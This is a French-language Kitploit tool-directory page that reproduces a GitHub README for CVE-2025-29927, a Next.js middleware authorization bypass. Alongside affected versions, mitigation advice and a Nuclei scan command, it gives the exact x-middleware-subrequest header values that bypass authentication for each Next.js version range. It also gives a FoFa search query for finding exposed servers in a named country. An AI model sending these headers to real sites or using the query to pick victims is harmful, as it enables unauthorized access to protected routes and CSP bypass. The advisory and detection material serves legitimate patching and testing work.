Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-29927 — CVE-2025-29927 : Vulnérabilité de contournement du middleware Next.js | Kitploit
Outils/GitHubGitHub/kh4sh3i/cve-2025-29927
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927 : Vulnérabilité de contournement du middleware Next.js

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager



CVE-2025-29927

CVE-2025-29927 : Vulnérabilité de contournement du middleware Next.js Ce dépôt démontre la vulnérabilité CVE-2025-29927 dans Next.js où l'en-tête interne x-middleware-subrequest peut être utilisé pour contourner les vérifications du middleware comme l'authentification.

Versions affectées

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Atténuation et remédiation

  • Mettez à jour Next.js vers les versions corrigées :
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Si la mise à jour n'est pas possible immédiatement, bloquez ou supprimez l'en-tête x-middleware-subrequest au niveau du serveur web ou du proxy :

Scénarios d'impact

  • Contournement d'autorisation : Les attaquants peuvent accéder aux routes protégées sans authentification ou autorisation appropriée.
  • Contournement de la politique de sécurité du contenu (CSP) : Si des en-têtes CSP sont ajoutés via le middleware, les attaquants peuvent contourner ces contrôles de sécurité, permettant potentiellement des attaques de cross-site scripting (XSS).
  • Déni de service par empoisonnement du cache : Dans certaines configurations, les attaquants peuvent empoisonner les caches avec du contenu non autorisé en contournant le middleware qui définit les en-têtes de contrôle du cache.

Utilisation du modèle Nuclei nextjs-CVE-2025-29927

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Exploitation selon les différentes versions de Next.js

  • Pour les versions antérieures à 12.2 :
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • Pour les versions 12.2 et ultérieures :
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • Pour les versions 13.2.0 et ultérieures :
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Ciblage avec FoFa

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

CTF gratuit pour ce CVE

  • CTF
Télécharger l’outil